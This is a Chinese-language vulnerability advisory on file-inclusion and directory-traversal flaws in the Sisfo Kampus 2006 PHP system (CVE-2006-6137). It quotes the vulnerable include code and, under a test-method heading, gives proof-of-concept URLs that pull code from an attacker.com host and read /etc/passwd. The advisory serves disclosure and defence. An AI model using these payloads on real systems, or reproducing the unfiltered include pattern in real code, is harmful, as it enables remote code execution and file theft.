安全研究
安全漏洞
Sisfo Kampus文件包含及目录遍历漏洞
发布日期:2006-11-27
更新日期:2006-11-28
受影响系统:
E. Setio Dewo Sisfo Kampus 2006 (Semarang 3)描述:
BUGTRAQ ID: 21294
CVE(CAN) ID: CVE-2006-6137
Sisfo Kampus是一款系统信息管理系统。
Sisfo Kampus在处理用户请求时存在输入验证漏洞,远程攻击者可能利用此漏洞在服务器上以Web进程权限执行任意命令。
Sisfo Kampus的index.php和print.php脚本没有过滤slnt参数的输入,允许攻击者通过包含本地或外部资源的任意文件导致执行任意代码。
index.php中漏洞代码如下:
-------------------------[Line 27]-----------------------------
<?php
if ($exec=='main.php' && file_exists("$themedir/main.php"))
include "$themedir/main.php";
else include $exec;
?>
-------------------------[Line 31]------------------------------
print.php中漏洞代码如下:
-------------------------[Line 15]------------------------------
<?php
include_once "sysfo/sysfo.common.php";
if (isset($_REQUEST['print'])) {
$print = $_REQUEST['print'];
include "$print";
}
else die (DisplayHeader($fmtErrorMsg, $strNoDataTobePrint));
include "disconnectdb.php";
?>
-------------------------[Line 25]-------------------------------
此外,Sisfo Kampus的downloadexcel.php脚本没有正确过滤fn参数的输入,允许攻击者通过目录遍历攻击下载任意文件。
download.php中漏洞代码如下:
-------------------------[Line 1]--------------------------------
<?php
DisplayHeader($fmtPageTitle, $strDownload);
include "lib/file.common.php";
if (isset($_REQUEST['dir'])) $dir = $_REQUEST['dir'];
else $dir = $Download_dir;
if (substr($dir, -1) != '/' && substr($dir, -1) != '\\') $dir = "$dir/";
DisplayDownloadDir($dir);
?>
-------------------------[Line 8]--------------------------------
<*来源:E. Setio Dewo (setio_dewo@telkom.net)
Wawan Firmansyah (angkaramurka2003@yahoo.com)
链接:http://secunia.com/advisories/23109/
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
http://www.victim.com/print.php?print=http://attacker.com/evilcode.txt?
http://www.victim.com/index.php?exec=print&print=http://attacker.com/evilcode.txt?
http://www.victim.com/index.php?exec=download&dir=/etc/passwd
建议:
厂商补丁:
E. Setio Dewo
-------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.sisfokampus.net
浏览次数:3157
严重程度:0(网友投票)
绿盟科技给您安全的保障
